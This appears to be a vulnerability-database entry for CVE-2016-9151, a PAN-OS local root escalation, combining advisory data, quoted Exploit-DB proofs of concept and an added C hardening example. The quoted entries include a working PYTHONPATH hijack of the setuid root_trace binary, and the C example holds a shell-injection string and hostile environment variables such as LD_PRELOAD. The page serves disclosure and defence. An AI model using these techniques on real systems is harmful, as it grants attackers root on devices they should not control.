CVE-2016-9151
Published: 2016-11-19
Priority: P346 · Severity: high, 7.8 (CVSS 3.0)
Exploit: public exploit code available
EPSS: 1.21% (64.5th percentile)
Palo Alto Networks PAN-OS before 5.0.20, 5.1.x before 5.1.13, 6.0.x before 6.0.15, 6.1.x before 6.1.15, 7.0.x before 7.0.11, and 7.1.x before 7.1.6 allows local users to gain privileges via crafted values of unspecified environment variables.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paloalto | pan-os | — | — |
| paloaltonetworks | pan-os | >= 5.0.0 < 5.0.20 | 5.0.20 |
| paloaltonetworks | pan-os | >= 5.1 < 5.1.13 | 5.1.13 |
| paloaltonetworks | pan-os | >= 6.0.0 < 6.0.15 | 6.0.15 |
| paloaltonetworks | pan-os | >= 6.1.0 < 6.1.15 | 6.1.15 |
| paloaltonetworks | pan-os | >= 7.0.0 < 7.0.11 | 7.0.11 |
| paloaltonetworks | pan-os | >= 7.1.0 < 7.1.6 | 7.1.6 |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 7.8 | HIGH | CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 4.6 | MEDIUM | AV:L/AC:L/Au:N/C:P/I:P/A:P |
Palo Alto
Local Privilege Escalation (CVE-2016-9151, HIGH, CWE-264)
vendor_paloalto · 2016-11-17 · CVSS 7.8
Palo Alto Networks firewalls do not properly validate certain environment variables, which could potentially allow code to execute with higher privileges (Ref # PAN-61104/100499/CVE-2016-9151).
A potential attacker with local shell access could manipulate arbitrary environment variables which could result in a process running with higher privileges.
This issue affects PAN-OS 5.0.19 and earlier; PAN-OS 5.1.12 and earlier; PAN-OS 6.0.14 and earlier; PAN-OS 6.1.14 and earlier; PAN-OS 7.0.10 and earlier; PAN-OS 7.1.5 and earlier
Affected products: PAN-OS
Solution: PAN-OS 5.0.20 and later; PAN-OS 5.1.13 and later; PAN-OS 6.0.15 and later; PAN-OS 6.1.15 and later; PAN-OS 7.0.11 and later; PAN-OS 7.1.6 and later
Workaround: Exploitation of this privilege escalation is re
GHSA
GHSA-48jw-g6cj-24gw (CVE-2016-9151, HIGH)
ghsa_unreviewed · 2022-05-13
Palo Alto Networks PAN-OS before 5.0.20, 5.1.x before 5.1.13, 6.0.x before 6.0.15, 6.1.x before 6.1.15, 7.0.x before 7.0.11, and 7.1.x before 7.1.6 allows local users to gain privileges via crafted values of unspecified environment variables.
No detection rules found.
Exploit-DB
Palo Alto Networks PanOS - 'root_reboot' Local Privilege Escalation (CVE-2016-9151)
exploitdb · 2016-11-18
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913
This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67
The root_reboot utility is setuid root, but performs multiple calls to system() with attacker-controlled data, such as this one:
.text:0804870F C7 44 24 04 78+ mov dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "...
.text:08048717 89 04 24 mov [esp], eax ; char **
.text:0804871A E8 0D FE FF FF call _asprintf
.text:0804871F 8B 45 E8 mov eax, [ebp+new]
.text:08048722 85 C0 test eax, eax
.text:08048724 0F 84 B9 01 00+ jz loc_80488E3
.text:0804872A 89 04 24 mov [esp], eax ; command
.text:0804872D E8 9A FD FF FF call _system
Which
Exploit-DB
Palo Alto Networks PanOS - 'root_trace' Local Privilege Escalation (CVE-2016-9151)
exploitdb · 2016-11-18
---
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:
$ ls -l /usr/local/bin/root_trace
-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace
As the environment is not scrubbed, you can just do something like this:
$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0)
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
This was fixed by PAN:
http://securityadvisories.paloaltonetworks.com/Home/Detail/67
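The two Exploit-DB entries above describe the same root cause from two angles: root_reboot splices caller data into a string handed to system(), and root_trace lets a setuid binary spawn an interpreter with the caller's unscrubbed environment (hence the PYTHONPATH trick). The C program below is an added example for this entry; it is not PAN-OS code and not the Project Zero proof of concept. It shows a hypothetical setuid-root helper in both unsafe shapes and then in a hardened shape (argument validated against an allowlist, passed as its own argv element, child started with a fixed environment through execve() instead of /bin/sh). The program path /usr/local/bin/elog, the UNTRUSTED_PREFIX list, the HOSTILE_ENV sample and the function names are assumptions, not taken from the advisory.

```c
/*
 * Added example for CVE-2016-9151; not PAN-OS code and not the Project Zero
 * PoC. A hypothetical setuid-root helper in the two unsafe shapes the
 * Exploit-DB entries describe (shell command line built from caller data;
 * child inheriting the caller's environment) and in a hardened shape.
 * Paths, the variable list and the sample environments are assumptions.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define ARG_MAX_LEN 64

/* Unsafe shape 1 (root_reboot): caller text embedded in a command line meant
 * for system(). Built here and never executed, so the injection stays
 * visible: the returned string is exactly what /bin/sh would parse as root. */
const char *unsafe_cmd_for(const char *reason) {
    static char cmd[256];
    /* "/usr/local/bin/elog -s" is a stand-in, not the real pan_elog call */
    snprintf(cmd, sizeof cmd, "/usr/local/bin/elog -s \"%s\"", reason);
    return cmd;
}

/* Unsafe shape 2 (root_trace): system() hands environ to /bin/sh and on to
 * whatever interpreter the target script runs under. Variables with these
 * prefixes change which code runs before the target's own logic starts.
 * glibc's secure mode removes LD_PRELOAD, LD_LIBRARY_PATH and its other
 * loader variables from a setuid process, but interpreter variables such as
 * PYTHONPATH survive and are inherited by every child. */
static const char *const UNTRUSTED_PREFIX[] = {
    "LD_", "GLIBC_TUNABLES=", "PYTHONPATH=", "PYTHONHOME=", "PYTHONSTARTUP=",
    "PERL5LIB=", "PERL5OPT=", "RUBYLIB=", "BASH_ENV=", "ENV=", "IFS=",
    "PATH=", "CDPATH=", NULL
};

/* Count entries of an inherited environment that an unprivileged caller must
 * not be allowed to pass into a root child. Meant for the caller's environ,
 * not for CLEAN_ENV below, which sets PATH and IFS to known values on purpose. */
int count_untrusted(char *const envp[]) {
    int n = 0;
    for (size_t i = 0; envp[i] != NULL; i++)
        for (size_t j = 0; UNTRUSTED_PREFIX[j] != NULL; j++)
            if (strncmp(envp[i], UNTRUSTED_PREFIX[j],
                        strlen(UNTRUSTED_PREFIX[j])) == 0) { n++; break; }
    return n;
}

/* Constructed sample of what a hostile admin shell could export. */
char *const HOSTILE_ENV[] = { "HOME=/tmp", "PYTHONPATH=/tmp",
                              "LD_PRELOAD=/tmp/x.so", "TERM=xterm", NULL };

/* Hardened shape: the child gets this and nothing from the caller. */
static char *const CLEAN_ENV[] = {
    "PATH=/usr/sbin:/usr/bin:/sbin:/bin", "IFS= \t\n", "LANG=C", NULL
};

/* Allowlist for one argument: short, alphanumeric plus . _ -, and not
 * option-shaped, so it can neither reach a shell nor be parsed as a flag. */
int arg_is_safe(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n > ARG_MAX_LEN || s[0] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Run prog with one validated argument and CLEAN_ENV via execve(), never
 * through /bin/sh. Returns the child's exit status, -1 if the argument is
 * rejected or fork fails, 127 if exec fails (the shell's own convention). */
int spawn_fixed(const char *prog, const char *arg) {
    if (!arg_is_safe(arg)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* a real helper would setuid(0) and chdir("/") here before exec */
        char *const argv[] = { (char *)prog, (char *)arg, NULL };
        execve(prog, argv, CLEAN_ENV);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    printf("unsafe command line: %s\n", unsafe_cmd_for("up\"; id; echo \""));
    printf("untrusted vars in hostile env: %d\n", count_untrusted(HOSTILE_ENV));
    printf("spawn with shell metachars: %d\n", spawn_fixed("/bin/true", "$(id)"));
    return 0;
}
```

The allowlist and the fixed environment together close both holes in the hypothetical helper: an argument such as `up"; id; echo "` is rejected before anything is forked, and a planted PYTHONPATH or LD_PRELOAD in the caller's shell never reaches the child because environ is not consulted at all. Blocklisting variables (count_untrusted) is shown only to make the inherited risk concrete; the fix is to construct the child's environment from scratch.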
No writeups or analysis indexed.
References
http://www.securityfocus.com/bid/94400
http://www.securitytracker.com/id/1037381
https://security.paloaltonetworks.com/CVE-2016-9151
https://www.exploit-db.com/exploits/40788/
https://www.exploit-db.com/exploits/40789/